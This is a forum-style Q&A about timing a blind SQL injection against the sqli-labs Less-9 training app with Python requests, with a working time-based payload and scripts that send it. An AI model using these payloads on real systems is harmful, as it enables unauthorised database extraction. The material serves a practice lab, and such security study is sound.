I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):

http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip

I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?

elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transfered.

If you want to measure that time, you need to measure it yourself:

import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip

I figured out that my payload should have been

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}

The last character '+' in the original payload is getting passed to the back end database, which results in an invalid SQL syntax. I shouldn't have done any manual encoding in the payload.